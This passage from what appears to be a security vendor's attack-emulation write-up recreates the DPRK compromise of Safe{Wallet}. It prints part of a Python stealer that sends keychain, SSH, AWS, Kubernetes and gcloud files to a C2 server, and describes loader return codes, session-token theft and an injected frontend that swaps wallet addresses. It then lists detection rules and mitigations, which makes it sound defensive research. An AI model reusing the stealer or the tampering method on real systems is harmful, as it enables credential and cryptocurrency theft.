# Options: 0, 1, 2, 3, 9.
# 0: Idle (sleep); 1: Execute native binary; 2: Execute Python code; 3: Execute multi-stage payload; 9: Terminate.
COMMAND_TO_SEND = 1   # Change this value to test different actions
</code></pre>
<p>Once we received our Poseidon payload callback to our <a href="https://github.com/its-a-feature/Mythic">Mythic C2</a> we were able to retrieve credentials using a variety of different methods provided by Poseidon.</p>
<p>Option 1: <a href="https://github.com/MythicAgents/poseidon/blob/master/documentation-payload/poseidon/commands/download.md">download command</a> - Access file, reads content, sends data back to C2.<br />
Option 2: <a href="https://github.com/MythicAgents/poseidon/blob/master/documentation-payload/poseidon/commands/getenv.md">getenv command</a> - Read user environment variables and send content back to C2.<br />
Option 3: <a href="https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agentfunctions/jsimport.go">jsimport</a> &amp; <a href="https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agentfunctions/jsimport_call.go">jsimport_call</a> commands - Import JXA script into memory then call a method within the JXA script to retrieve credentials from file and return contents.</p>
<h5>Ret == 2: Receive and Execute arbitrary Python code within Process Memory</h5>
<p>(VT Hash: <code>e89bf606fbed8f68127934758726bbb5e68e751427f3bcad3ddf883cb2b50fc7</code>)</p>
<p>The loader script allows for the running of arbitrary Python code or scripts, in memory. In Unit42’s blog they provided a Python script they observed the DPRK executing via this return value. This script collects a vast amount of data. This data is XOR encoded and sent back to the C2 server via a POST request. For the emulation all that was needed was to add our C2 URL with the appropriate route as defined in our C2 server and base64 encode the script hardcoding its path within our server for when this option was tested.</p>
<pre><code class="language-py">def get_info():
    global id
    id = base64.b64encode(os.urandom(16)).decode('utf-8')
    
    # get xor key
    while True:
        if not get_key():
            break

        base_info()
        send_directory('home/all', '', home_dir)
        send_file('keychain', os.path.join(home_dir, 'Library', 'Keychains', 'login.keychain-db'))
        send_directory('home/ssh', 'ssh', os.path.join(home_dir, '.ssh'), True)
        send_directory('home/aws', 'aws', os.path.join(home_dir, '.aws'), True)
        send_directory('home/kube', 'kube', os.path.join(home_dir, '.kube'), True)
        send_directory('home/gcloud', 'gcloud', os.path.join(home_dir, '.config', 'gcloud'), True)
        finalize()
        break
</code></pre>
<h5>Ret == 3: Write Binary Payload and Binary Config to Disk, Execute Payload and Delete File</h5>
<p>For ret == 3 we used a standard Poseidon binary payload and a “configuration file” containing binary data as specified in the loader script. We then base64 encoded both the binary and config file like the ret == 1 option above and hardcoded their paths in our C2 server for serving when testing this command. Same as the ret == 1 option above we were able to use those same commands to collect credentials from the target system.</p>
<h4>C2 Infrastructure</h4>
<p>We created a very simple and small C2 server, built with Python+Flask, intended to listen with a specified port on our Kali Linux VM and evaluate incoming requests, responding appropriately based on the route and return value we wished to test.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image15.png" alt="Custom Python+Flask C2 Server" /></p>
<p>We also used the open source <a href="https://github.com/its-a-feature/Mythic">Mythic C2</a> in order to facilitate the creation and management of the Poseidon payloads we used. Mythic is an open source C2 framework created and maintained by <a href="https://github.com/its-a-feature">Cody Thomas</a> at <a href="https://specterops.io/">SpecterOps</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image14.png" alt="Mythic C2 Active Callbacks Interactive Agent Window" /></p>
<h4>Malicious Python Application: Docker Version</h4>
<p>We also explored a Dockerized variant of the malicious Python application. This version was packaged in a minimal Python Docker container (python:3.12.2-slim) running in privileged mode, granting it the ability to access host resources.</p>
<p>A containerized application creates a telemetry and detection blind spot on macOS because Apple's Endpoint Security Framework (ESF) lacks the ability to introspect containerized processes. While ESF and endpoint detection solutions can still observe the trusted Docker process accessing sensitive host files—such as SSH keys, AWS credentials, or user configuration data—these actions commonly align with standard developer workflows. As a result, security tools are less likely to scrutinize or trigger alerts on containerized activities, offering attackers increased stealth when operating from within Docker environments.</p>
<p>This highlights the necessity for additional monitoring like <a href="https://www.osquery.io/">OSQuery</a> and <a href="https://www.docker.com/">Docker</a> log file collection to complement standard macOS endpoint defenses. Elastic offers both <a href="https://www.elastic.co/es/docs/reference/integrations/osquery_manager">OSQuery</a> and <a href="https://www.elastic.co/es/docs/reference/beats/filebeat/filebeat-input-container">Docker</a> log file collection via our <a href="https://www.elastic.co/es/integrations/data-integrations">data integrations</a> for Elastic Agent alongside our Endpoint protection features.</p>
<h4>MacOS Emulation Conclusion</h4>
<p>Our emulation recreated the attack against the SAFE developers’ macOS system end-to-end using the real world payloads.</p>
<p><strong>Malicious Python App:</strong></p>
<p>We began by replicating the malicious Python application described in both Mandiant’s findings and Unit42’s report. The attackers had forked a legitimate open-source application and embedded RCE access within <code>data_fetcher.py</code>. This script made outbound requests to an attacker-controlled server and conditionally fetched a malicious YAML file. Using PyYAML’s <code>yaml.load()</code> with an unsafe loader, the attacker triggered arbitrary code execution via deserialization.</p>
<p><strong>PyYAML Payload Deserialization resulting in Python Loader Script Execution:</strong></p>
<p>The YAML payload wrote a base64-encoded second-stage loader to <code>~/Public/__init__.py</code> and executed it in a detached process. We mimicked this exact flow using a Flask-based staging server hosted on PythonAnywhere.</p>
<p><strong>Python Loader Execution &amp; C2 Interaction:</strong></p>
<p>Once launched, the loader deleted its on disk file and beaconed to our emulated C2, awaited tasking. Based on the C2’s response code (<code>ret</code>), we tested the following actions:</p>
<ul>
<li><strong>ret == 1</strong>: The loader decoded a Poseidon payload (compiled as a <code>.dylib</code>) and executed it using <code>ctypes.cdll.LoadLibrary()</code>, resulting in native code execution from disk.</li>
<li><strong>ret == 2</strong>: The loader executed an in-memory Python stealer, matching the script shared by Unit42. This script collected system, user, browser, and credential data and exfiltrated it via XOR-encoded POST requests.</li>
<li><strong>ret == 3</strong>: The loader wrote a Poseidon binary and a separate binary configuration file to disk, executed the binary with the config as an argument, then deleted the payload.</li>
<li><strong>ret == 9</strong>: The loader terminated its polling loop.</li>
</ul>
<p><strong>Data Collection: Pre-Pivot Recon &amp; Credential Access:</strong></p>
<p>During our <strong>ret == 2</strong> test, the Python stealer gathered:</p>
<ul>
<li>macOS system information (<code>platform</code>, <code>os</code>, <code>user</code>)</li>
<li>Chrome user data (Bookmarks, Cookies, Login Data, etc.)</li>
<li>SSH private keys (<code>~/.ssh</code>)</li>
<li>AWS credentials (<code>~/.aws/credentials</code>)</li>
<li>macOS Keychain files (<code>login.keychain-db</code>)</li>
<li>GCP/Kube config files from <code>.config/</code></li>
</ul>
<p>This emulates the pre-pivot data collection that preceded cloud exploitation, and reflects how DPRK actors harvested AWS credentials from the developer’s local environment.</p>
<p>With valid AWS credentials, the threat actors then pivoted into the cloud environment, launching the second phase of this intrusion.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image22.png" alt="AWS cloud compromise execution flow" /></p>
<h3>AWS cloud compromise</h3>
<h4>Pre-requisities and Setup</h4>
<p>To emulate the AWS stage of this attack, we first leveraged Terraform to stand up the necessary infrastructure. This included creating an IAM user (developer) with an overly permissive IAM policy granting access to S3, IAM, and STS APIs. We then pushed a locally built Next.js application to an S3 bucket and confirmed the site was live, simulating a simple Safe{Wallet} frontend.</p>
<p>Our choice of <code>Next.js</code> was predicated on the original S3 bucket static site path - <code>https://app[.]safe[.]global/_next/static/chunks/pages/_app-52c9031bfa03da47.js</code></p>
<p>Before injecting any malicious code, we verified the integrity of the site by performing a test transaction using a known target wallet address to ensure the application responded as expected.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image1.png" alt="Transaction by custom frontend static site" /></p>
<h4>Temporary Session Token Retrieval</h4>
<p>Following the initial access and post-compromise activity on the developer’s macOS workstation, early assumptions focused on the adversary retrieving credentials from default AWS configuration locations - such as <code>~/.aws</code> or from user environment variables. It was later confirmed by Unit42’s blog that the Python stealer script targeted AWS files. These locations often store long-term IAM credentials or temporary session tokens used in standard development workflows. Based on public reporting, however, this specific compromise involved AWS user session tokens, not long-term IAM credentials. In our emulation, as the developer we added our virtual MFA device to our IAM user, enabled it and then retrieved our user session token and exported the credentials to our environment. Note that on our Kali Linux endpoint, we leveraged ExpressVPN - as done by the adversaries - for any AWS API calls or interactions with the developer box.</p>
<p>It is suspected that the developer obtained temporary AWS credentials either by the <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html">GetSessionToken</a> API operation or by logging in via AWS Single Sign-On (SSO) using the AWS CLI. Both methods result in short-lived credentials being cached locally and usable for CLI or SDK-based interactions. These temporary credentials were then likely cached in the <code>~/.aws</code> files or exported as environment variables on the macOS system.</p>
<p>In the <em>GetSessionToken</em> scenario, the developer would have executed a command as such:</p>
<pre><code class="language-shell">aws sts get-session-token --serial-number &quot;$ARN&quot; --token-code &quot;$FINAL_CODE&quot;  --duration-seconds 43200 --profile &quot;$AWS_PROFILE&quot; --output json
</code></pre>
<p>In the SSO-based authentication scenario, the developer may have run:</p>
<pre><code class="language-shell">aws configure sso 
aws sso login -profile &quot;$AWS_PROFILE&quot; -use-device-code &quot;OTP&quot;`
</code></pre>
<p>Either method results in temporary credentials (access key, secret and session token) being saved in <code>~/.aws</code> files and made available to the configured AWS profile. These credentials are then used automatically by tools like the AWS CLI or SDKs like Boto3 unless overridden. In either case, if malware or an adversary had access to the developer’s macOS system, these credentials could have been easily harvested from the environment variables, AWS config cache or credentials file.</p>
<p>To obtain these credentials for Developer1 were created a custom script for quick automation. It created a virtual MFA device in AWS, registered the device with our Developer1 user, then called <code>GetSessionToken</code> from STS - adding the returned temporary user session credentials to our macOS endpoint as environment variables as shown below.</p>
<h4>MFA Device Registration Attempts</h4>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image20.png" alt="Registering our MFA device for the developer and retrieving user session token via shellscript" /></p>
<p>One key assumption here is that the developer was working with a user session that had MFA enabled, either for direct use or to assume a custom-managed IAM role. Our assumption derives from the credential material compromised - AWS temporary user session tokens, which are not obtained from the console but rather requested on demand from STS. Temporary credentials returned from <code>GetSessionToken</code> or SSO by default expire after a certain number of hours, and a session token with the ASIA* prefix would suggest that the adversary harvested a short-lived but high-impact credential. This aligns with behaviors seen in previous DPRK-attributed attacks where credentials and configurations for Kubernetes, GCP, and AWS were extracted and reused.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image11.png" alt="Environment variables output of our AWS user session token after GetSessionToken call" /></p>
<h4>Assuming the Compromised Identity on Kali</h4>
<p>Once the AWS session token was collected, the adversary likely stored it on their Kali Linux system either in the standard AWS credential locations (e.g., <code>~/.aws/credentials</code> or as environment variables) or potentially in a custom file structure, depending on tooling in use. While the AWS CLI defaults to reading from <code>~/.aws/credentials</code> and environment variables, a Python script leveraging Boto3 could be configured to source credentials from nearly any file or path. Given the speed and precision of the post-compromise activity, it is plausible that the attacker used either the AWS CLI, direct Boto3 SDK calls, or shell scripts wrapping CLI commands - all of which offer convenience and built-in request signing.</p>
<p>What seems less likely is that the attacker manually signed AWS API requests using SigV4, as this would be unnecessarily slow and operationally complex. It’s also important to note that no public blog has disclosed which user agent string was associated with the session token usage (e.g. aws-cli, botocore, etc.), which leaves uncertainty around the attacker’s exact tools. That said, given DRPK’s established reliance on Python and the speed of the attack, CLI or SDK usage remains the most reasonable assumption.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image16.png" alt="MythicC2 getenv command output" /></p>
<p><strong>Note:</strong> We did this in emulation with our Poseidon payload prior to Unit 42’s blog about the RN Loader capabilities.</p>
<p>It’s important to clarify a nuance about the AWS authentication model: using a session token does not <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_control-access_getsessiontoken.html">inherently block access to IAM API actions</a> - even actions like <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateVirtualMFADevice.html">CreateVirtualMFADevice</a> - as long as the session was initially established with MFA. In our emulation, we attempted to replicate this behavior using a stolen session token that had MFA context. Interestingly, our attempts to register an additional MFA device failed, suggesting that there may be additional safeguards, such as explicit policy constraints, that prevent MFA registration via session tokens or the details of this behavior are still too vague and we incorrectly mimicked the behavior. While the exact failure reason remains unclear, this behavior warrants deeper investigation into the IAM policies and authentication context associated with session-bound actions.</p>
<h4>S3 Asset Enumeration</h4>
<p>After credential acquisition, the attacker likely enumerated accessible AWS services. In this case, Amazon S3 was a clear target. The attacker would have listed buckets available to the compromised identity across all regions and located a public-facing bucket associated with Safe{Wallet}, which hosted the frontend Next.js application for transaction processing.</p>
<p>We assume the attacker was aware of the S3 bucket due to its role in serving content for <code>app.safe[.]global</code>, meaning the bucket's structure and assets could be publicly browsed or downloaded without authentication. In our emulation, we validated similar behavior by syncing assets from a public S3 bucket used for static site hosting.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image6.png" alt="Bucket containing statically hosted frontend static site assets" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image21.png" alt="Statically hosted frontend static site assets in target bucket" /></p>
<h4>Next.js App Overwrite with Malicious Code</h4>
<p>After discovering the bucket, the attacker likely used the aws s3 <a href="https://docs.aws.amazon.com/cli/latest/reference/s3/sync.html">sync</a> command to download the entire contents, which included the bundled frontend JavaScript assets. Between February 5 and February 19, 2025, they appeared to focus on modifying these assets - specifically, files like <code>main.&lt;HASH&gt;.js</code> and related routes, which are output by <code>Next.js</code> during its build process and stored under the <code>_next/static/chunks/pages/</code> directory. These bundled files contain the transpiled application logic, and according to Sygnia's forensic report, a file named <code>_app-52c9031bfa03da47.js</code> was the primary injection point for the malicious code.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image23.png" alt="Leveraging AWS CLI sync command to download bucket contents" /></p>
<p>Next.js applications, when built, typically store their statically generated assets under the <code>next/static/</code> directory, with JavaScript chunks organized into folders like <code>/chunks/pages/</code>. In this case, the adversary likely formatted and deobfuscated the JavaScript bundle to understand its structure, then reverse engineered the application logic. After identifying the code responsible for handling user-entered wallet addresses, they injected their <a href="">payload</a>. This payload introduced conditional logic: if the entered wallet address matched one of several known target addresses, it would silently replace the destination with a DPRK-controlled address, redirecting funds without the user becoming aware.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image4.png" alt="" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image7.png" alt="Modifying the non-formatted bundled static site code of our own app" /></p>
<p>In our emulation, we replicated this behavior by modifying the <code>TransactionForm.js</code> component to check if the entered recipient address matched specific values. If so, the address was replaced with an attacker-controlled wallet. While this does not reflect the complexity of actual smart contract manipulation or delegate calls used in the real-world attack, it serves as conceptual behavior to illustrate how a compromised frontend could silently redirect cryptocurrency transactions.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image2.png" alt="Our static site frontend script pop-up notifying the target wallet address condition was met after malicious code upload" /></p>
<h4>Static Site Tampering Implications and Missing Security Controls</h4>
<p>This type of frontend tampering is especially dangerous in Web3 environments, where decentralized applications (dApps) often rely on static, client-side logic to process transactions. By modifying the JavaScript bundle served from the S3 bucket, the attacker was able to subvert the application’s behavior without needing to breach backend APIs or smart contract logic.</p>
<p>We assume that protections such as <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lock.html">S3 Object Lock</a>, Content-Security-Policy (CSP), or Subresource Integrity (SRI) headers were either not in use or not enforced during the time of compromise. The absence of these controls would have allowed an attacker to modify static frontend code without triggering browser or backend integrity validation, making such tampering significantly easier to carry out undetected.</p>
<h2>Lessons in defense</h2>
<p>A successful emulation—or real-world incident response—doesn’t end with identifying attacker behaviors. It continues with reinforcing defenses to prevent similar techniques from succeeding again. Below, we outline key detections, security controls, mitigation strategies, and Elastic features that can help reduce risk and limit exposure to the tactics used in this emulation and in-the-wild (ItW) campaigns like the Safe{Wallet} compromise.</p>
<p><strong>Note:</strong> These detections are actively maintained and regularly tuned, and may evolve over time. Depending on your environment, additional tuning may be required to minimize false positives and reduce noise.</p>
<h2>Elastic’s SIEM detection and endpoint prevention rules</h2>
<p>Once we understand adversary behavior through emulation and implement security controls to harden the environment, it’s equally important to explore detection opportunities and capabilities to identify and respond to these threats in real time.</p>
<p>Once we understand adversary behavior through emulation and implement security controls to harden the environment, it’s equally important to explore detection opportunities and capabilities to identify and respond to these threats in real time.</p>
<h4><a href="https://github.com/elastic/protections-artifacts/tree/main/behavior/rules/macos">MacOS Endpoint Behavior Prevention Rules</a></h4>
<h5>Python PyYAML Deserialization Payload</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_python_script_drop_and_execute.md">Python Script Drop and Execute</a>”:</strong> Detects when a Python script gets created or modified followed immediately by the execution of that script by the same Python process.</p>
<h5>Python Loader Script</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_self_deleting_python_script.md">Self-Deleting Python Script</a>”:</strong> Detects when a Python script executes and that script file is immediately deleted by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/84966f02a1b71cce13db22b6c348cb46560529b7/hunting/macos/docs/defense_evasion_self_deleted_python_script_outbound_network_connection.md">Self-Deleted Python Script Outbound Connection</a>”:</strong> Detects when a Python script gets deleted and an outbound network connection occurs shortly after by the same Python process.</p>
<h5>Python Loader Script Ret == 1</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/84966f02a1b71cce13db22b6c348cb46560529b7/hunting/macos/docs/command_and_control_suspicious_executable_file_creation_via_python.md">Suspicious Executable File Creation via Python</a>”:</strong> Detects when an executable file gets created or modified by Python in suspicious or unusual directories.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_python_library_load_and_delete.md">Python Library Load and Delete</a>”:</strong> Detects when a shared library, located within the users home directory, gets loaded by Python followed by the deletion of the library shortly after by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unusual_library_load_via_python.md">Unusual Library Load via Python</a>”:</strong> Detects when a shared library gets loaded by Python that does not denote itself as a .dylib or .so file and is located within the users home directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/endpoint-rules/blob/13bad7e92e53f078b97bbeb376aedb23797be21b/rules/macos/defense_evasion_potential_in_memory_jxa_load_via_untrusted_or_unsigned_binary.toml">In-Memory JXA Execution via ScriptingAdditions</a>”:</strong> Detects the in-memory load and execution of a JXA script.</p>
<h5>Python Loader Script Ret == 2</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/credential_access_potential_python_stealer.md">Potential Python Stealer</a>”:</strong> Detects when a Python script gets executed followed shortly after by at least three attempts to access sensitive files by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_self_deleted_python_script_accessing_sensitive_files.md">Self-Deleted Python Script Accessing Sensitive Files</a>”:</strong> Detects when a Python script gets deleted and sensitive files are accessed shortly after by the same Python process.</p>
<h5>Python Loader Script Ret == 3</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unsigned_or_untrusted_binary_execution_via_python.md">Unsigned or Untrusted Binary Execution via Python</a>”:</strong> Detects when an unsigned or untrusted binary gets executed by Python where the executable is located within a suspicious directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unsigned_or_untrusted_binary_fork_via_python.md">Unsigned or Untrusted Binary Fork via Python</a>”:</strong> Detects when an unsigned or untrusted binary gets fork exec’d by Python where the process argument is the path to a file within the users home directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/endpoint-rules/blob/13bad7e92e53f078b97bbeb376aedb23797be21b/rules/macos/credential_access_cloud_credential_file_accessed_by_untrusted_or_unsigned_process.toml">Cloud Credential Files Accessed by Process in Suspicious Directory</a>”:</strong> Detects when cloud credentials are accessed by a process running from a suspicious directory.</p>
<h4>SIEM Detections for AWS CloudTrail Logs</h4>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/44a2f4c41aa1482ec545f0391040e254c29a8d80/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml">STS Temporary IAM Session Token Used from Multiple Addresses</a>”:</strong> Detects AWS IAM session tokens (e.g. ASIA*) being used from multiple source IP addresses in a short timeframe, which may indicate credential theft and reuse from adversary infrastructure.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/2f4a310cc5d75f8d8f2a2d0f5ad5e5a4537e26a3/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml">IAM Attempt to Register Virtual MFA Device with Temporary Credentials</a>”:</strong> Detects attempts to call CreateVirtualMFADevice or EnableMFADevice with AWS session tokens. This may reflect an attempt to establish persistent access using hijacked short-term credentials.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/b64ecc925304b492d7855d357baa6c68711eef9a/rules/integrations/aws/persistence_iam_sts_api_calls_via_user_session_token.toml">API Calls to IAM via Temporary Session Tokens</a>”:</strong> Detects use of sensitive iam.amazonaws.com API operations by a principal using temporary credentials (e.g. session tokens with ASIA* prefix). These operations typically require MFA or should only be performed via the AWS console or federated users. Not CLI or automation tokens.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/29dfe1217d1320ab400d051de377664fdbb09493/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml">S3 Static Site JavaScript File Uploaded via PutObject</a>”:</strong> Identifies attempts by IAM users to upload or modify JavaScript files in the static/js/ directory of an S3 bucket, which can signal frontend tampering (e.g. injection of malicious code)</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/b35f7366e92321105f61249b233f436c40b59c19/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml">AWS CLI with Kali Linux Fingerprint Identified</a>”:</strong> Detects AWS API calls made from a system using Kali Linux, as indicated by the user_agent.original string. This may reflect attacker infrastructure or unauthorized access from red team tooling.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/main/hunting/aws/queries/s3_public_bucket_rapid_object_access_attempts.toml">S3 Excessive or Suspicious GetObject Events</a>”:</strong> Detects a high volume of S3 GetObject actions by the same IAM user or session within a short time window. This may indicate S3 data exfiltration using tools like AWS CLI command <em>sync</em> - particularly targeting static site files or frontend bundles. Note, this is a hunting query and should be adjusted accordingly.</p>
<h4>SIEM Detections for Docker Abuse</h4>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_suspicious_file_access_via_docker.md">Sensitive File Access via Docker</a>”:</strong> Detects when Docker accesses sensitive host files (“ssh”, “aws”, “gcloud”, “azure”, “web browser”, “crypto wallet files”).</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_suspicious_executable_file_modification_via_docker.md">Suspicious Executable File Modification via Docker</a>”:</strong> Detects when Docker creates or modifies an executable file within a suspicious or unusual directory.</p>
<p>If your macOS agent policy includes the <a href="https://www.elastic.co/es/docs/reference/beats/filebeat/filebeat-input-container">Docker data integration</a>, you can collect valuable telemetry that helps surface malicious container activity on user systems. In our emulation, this integration allowed us to ingest Docker logs (into the metrics index), which we then used to build a detection rule capable of identifying indicators of compromise and suspicious container executions associated with the malicious application.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image17.png" alt="" /></p>
<h2>Mitigations</h2>
<h3>Social Engineering</h3>
<p>Social engineering plays a major role in many intrusions, but especially with the DPRK. They are highly adept at targeting and approaching their victims utilizing trusted public platforms like LinkedIn, Telegram, X or Discord to initiate contact and appear legitimate. Many of their social engineering campaigns attempt to convince the user to download and execute some kind of project, application or script whether it be out of necessity (job application), distress (debugging assistance) etc.. Mitigation of targeting that leverage social engineering is difficult and takes a concerted effort by a company to ensure their employees are regularly trained to recognize these attempts, applying the proper skepticism and caution when engaging outside entities and even the open source communities.</p>
<ul>
<li>User Awareness Training</li>
<li>Manual Static Code Review</li>
<li>Static Code and Dependency Scanning</li>
</ul>
<p>Bandit (<a href="https://github.com/PyCQA/bandit">GitHub - PyCQA/bandit: Bandit is a tool designed to find common security issues in Python code.</a>) is a great example of an open source tool a developer could use to scan the Python application and its scripts prior to execution in order to surface common Python security vulnerabilities or dangerous issues that may be present in the code.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image19.png" alt="" /></p>
<h3>Application and Device Management</h3>
<p>Application controls via a device management solution or a binary authorization framework like the open source tool Santa (<a href="https://github.com/northpolesec/santa">GitHub - northpolesec/santa: A binary and file access authorization system for macOS.</a>) could have been used to enforce notarization and block execution from suspicious paths. This would have prevented the execution of the Poseidon payload dropped to the system for persistence, and could have prevented access to sensitive files.</p>
<h3>EDR/XDR</h3>
<p>To effectively defend against nation-state threats—and the many other attacks targeting macOS—it's critical to have an EDR solution in place that provides rich telemetry and correlation capabilities to detect and prevent script-based attacks. Taking it a step further, an EDR platform like Elastic allows you to ingest AWS logs alongside endpoint data, enabling unified alerting and visibility through a single pane of glass. When combined with AI-powered correlation, this approach can surface cohesive attack narratives, significantly accelerating response and improving your ability to act quickly if such an attack occurs.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image3.png" alt="Elastic Alerts Dashboard" /></p>
<h3>AWS Credential Exposure and Session Token Hardening</h3>
<p>In this attack, the adversary leveraged a stolen AWS user session token (with the ASIA* prefix), which had been issued via the GetSessionToken API using MFA. These credentials were likely retrieved from the macOS developer environment — either from exported environment variables or default AWS config paths (e.g., <code>~/.aws/credentials</code>).</p>
<p>To mitigate this type of access, organizations can implement the following defensive strategies:</p>
<ol>
<li><strong>Reduce Session Token Lifetimes and Move Away from IAM Users</strong>: Avoid issuing long-lived session tokens to IAM users. Instead, enforce short token durations (e.g., 1 hour or less) and adopt AWS SSO (IAM Identity Center) for all human users. This makes session tokens ephemeral, auditable, and tied to identity federation. Disabling sts:GetSessionToken permissions for IAM users altogether is the strongest approach, and IAM Identity Center allows this transition.</li>
<li><strong>Enforce Session Context Restrictions for IAM API Usage</strong>: Implement IAM policy condition blocks that explicitly deny sensitive IAM operations, such as <em>iam:CreateVirtualMFADevice</em> or <em>iam:AttachUserPolicy</em>, if the request is made using temporary credentials. This ensures that session-based keys, such as those used in the attack, cannot escalate privileges or modify identity constructs.</li>
<li><strong>Limit MFA Registration to Trusted Paths</strong>: Block MFA device creation (<em>CreateVirtualMFADevice</em>, <em>EnableMFADevice</em>) via session tokens unless coming from trusted networks, devices, or IAM roles. Use <em>aws:SessionToken</em> or <em>aws:ViaAWSService</em> as policy context keys to enforce this. This would have prevented the adversary from attempting MFA-based persistence using the hijacked session.</li>
</ol>
<h3>S3 Application Layer Hardening (Frontend Tampering)</h3>
<p>After obtaining the AWS session token, the adversary did not perform any IAM enumeration — instead, they pivoted quickly to S3 operations. Using the AWS CLI and temporary credentials, they listed S3 buckets and modified static frontend JavaScript hosted on a public S3 bucket. This allowed them to replace the production Next.js bundle with a malicious variant designed to redirect transactions based on specific wallet addresses.</p>
<p>To prevent this type of frontend tampering, implement the following hardening strategies:</p>
<ol>
<li><strong>Enforce Immutability with S3 Object Lock</strong>: Enable S3 Object Lock in compliance or governance mode on buckets hosting static frontend content. This prevents overwriting or deletion of files for a defined retention period - even by compromised users. Object Lock adds a strong immutability guarantee and is ideal for public-facing application layers. Access to put new objects (rather than overwrite) can still be permitted via deployment roles.</li>
<li><strong>Implement Content Integrity with Subresource Integrity (SRI)</strong>: Include SRI hashes (e.g., SHA-256) in the &lt;script&gt; tags within index.html to ensure the frontend only executes known, validated JavaScript bundles. In this attack, the lack of integrity checks allowed arbitrary JavaScript to be served and executed from the S3 bucket. SRI would have blocked this behavior at the browser level.</li>
<li><strong>Restrict Upload Access Using CI/CD Deployment Boundaries</strong>: Developers should never have direct write access to production S3 buckets. Use separate AWS accounts or IAM roles for development and CI/CD deployment. Only OIDC-authenticated GitHub Actions or trusted CI pipelines should be permitted to upload frontend bundles to production buckets. This ensures human credentials, even if compromised, cannot poison production.</li>
<li><strong>Lock Access via CloudFront Signed URLs or Use S3 Versioning</strong>: If the frontend is distributed via CloudFront, restrict access to S3 using signed URLs and remove public access to the S3 origin. This adds a proxy and control layer. Alternatively, enable S3 versioning and monitor for overwrite events on critical assets (e.g., /static/js/*.js). This can help detect tampering by adversaries attempting to replace frontend files.</li>
</ol>
<h2>Attack Discovery (AD)</h2>
<p>After completing the end-to-end attack emulation, we tested Elastic’s new AI Attack Discovery feature to see if it could connect the dots between the various stages of the intrusion. Attack Discovery integrates with an LLM of your choice to analyze alerts across your stack and generate cohesive attack narratives. These narratives help analysts quickly understand what happened, reduce response time, and gain high-level context. In our test, it successfully correlated the endpoint compromise with the AWS intrusion, providing a unified story that an analyst could use to take informed action.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image10.png" alt="Elastic Attack Discovery" /></p>
<h2>OSQuery</h2>
